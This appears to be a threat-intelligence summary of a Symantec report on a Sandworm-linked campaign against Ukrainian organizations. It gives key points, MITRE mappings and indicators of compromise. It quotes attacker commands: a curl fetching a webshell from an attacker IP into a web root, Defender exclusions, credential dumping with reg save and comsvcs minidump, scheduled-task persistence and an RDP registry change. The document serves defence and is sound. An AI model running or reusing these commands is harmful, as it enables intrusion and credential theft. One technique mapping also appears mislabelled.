Threat Research

Ukrainian organizations still heavily targeted by Russian attacks

Symantec
Ukrainian organizations still heavily targeted by Russian attacks

A Russian-linked actor deployed Localolive webshells and extensive Living-off-the-Land and dual-use tooling to conduct prolonged intrusions against Ukrainian organizations, focusing on credential harvesting and persistent access. Symantec recovered multiple file hashes and network indicators tied to webshells, PowerShell backdoors, and suspicious executables. #Localolive #Sandworm

Keypoints

  • Attackers deployed Localolive and other webshells on public-facing servers, likely via unpatched vulnerabilities to gain initial access.
  • Adversaries relied heavily on Living-off-the-Land and dual-use tools, minimizing bespoke malware usage while using commands, scheduled tasks, and native Windows utilities to collect data.
  • Reconnaissance and credential-harvesting techniques included systeminfo, tasklist, reg save, memory dumps (rundll32 comsvcs.dll minidump, rdrleakdiag), and queries for KeePass processes.
  • Multiple scheduled tasks were created to perform periodic memory dumps and to run PowerShell backdoors (e.g., link.ps1) every 30 minutes to maintain persistence.
  • Attackers installed and configured OpenSSH and firewall rules to enable remote access, and modified RDP-related registry keys to permit unauthenticated connections.
  • Symantec identified numerous file indicators (webshells, unknown executables, PowerShell backdoors) and network indicators tied to attacker infrastructure, and provided hashes for detection.
  • Activity spanned at least June 27–August 20, 2025, affecting a large business services organization and a local government organization in Ukraine, consistent with Russian-origin threat activity linked to Sandworm.

MITRE Techniques

  • [T1505] Server Software Component – Webshells (Localolive) were deployed on public-facing servers, providing initial access: “cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:inetpubwwwrootaspnet_clientservice.aspx”.
  • [T1204] User Execution – Attackers ran downloaded executables and scripts from the Downloads folder (e.g., service.exe, cloud.exe, dotnet-install.ps1): “CSIDL_PROFILEdownloadsservice.exe”.
  • [T1059] Command and Scripting Interpreter – Use of cmd.exe, PowerShell, and Python scripts to execute reconnaissance, configure Defender exclusions, and run backdoors: “powershell Add-MpPreference -ExclusionPath CSIDL_PROFILEdownloads”.
  • [T1053] Scheduled Task/Job – Creation of scheduled tasks to run every 30 minutes for memory dumping and backdoor execution: “schtasks /create /sc minute /mo 30 /tn asd /ru system /rl highest /f /tr …minidump…”.
  • [T1003] OS Credential Dumping – Memory dumps and registry hive saves were performed to extract credentials: “reg.exe save hklmsystem CSIDL_PROFILE1.log” and rundll32 comsvcs.dll minidump commands.
  • [T1016] System Network Configuration Discovery – Network reconnaissance commands like arp and tracert were executed to map network connectivity: “CSIDL_SYSTEMcmd.exe /C arp -a” and “tracert 8.8.8.8”.
  • [T1018] Remote System Discovery – Active Directory and domain enumeration were performed (Get-AdComputer; net group /domain): “powershell Get-AdComputer -filter *” and “CSIDL_SYSTEMcmd.exe /C net group /domain [REMOVED]”.
  • [T1112] Modify Registry – Registry keys were modified to permit RDP connections without pre-authentication: ‘reg add “HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp” /v SecurityLayer /t Reg_DWORD /d 0 /f’.
  • [T1486] Data Encrypted for Impact (partial) – While destructive encryption was not observed here, group context (Sandworm) is known for disruptive operations; the report notes the group’s destructive history: “…history of specializing in destructive attacks…”.
  • [T1105] Ingress Tool Transfer – Downloading tools and webshells from attacker-controlled infrastructure to compromised hosts: “curl 185.145.245.209:22065/service.aspx”.
  • [T1490] Inhibit System Recovery – Disabling or excluding Windows Defender scanning for Downloads to reduce detection risk: “powershell Add-MpPreference -ExclusionPath CSIDL_PROFILEdownloads”.

Indicators of Compromise

  • [File hash] Webshell and backdoor detections – 636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb (Localolive), 70a5492db39585ec18de512058a5389c9a4043fba13ca8ad7d057ead66298626 (webshell)
  • [File hash] Suspicious executables – 8c07c37ac84d4c6fd76de3d966e26b65e401bc641a845baf6f73ad0d6a10fc6b (service.exe), 44b1f3f06607cd3ee16517d31b30208910ce678cb69ba7a0514546dff183dfce (cloud.exe)
  • [File hash] PowerShell backdoors – cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7 (link.ps1), e03b8c54ac916b363f956e4e4e04a19eb4119455d8006c92e9328e16a8cee52f (torrent_cache.ps1)
  • [File name] Legitimate tool placed by attackers – winbox64.exe (Microtik router management app) – listed as deployed in Downloads and appearing in CERT-UA Sandworm reporting.
  • [Network IP / Domain] Infrastructure – 185.145.245[.]209 (used to serve service.aspx), ciscoheartbeat[.]com (attacker-associated domain)

Read more: https://www.security.com/threat-intelligence/ukraine-russia-attacks

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint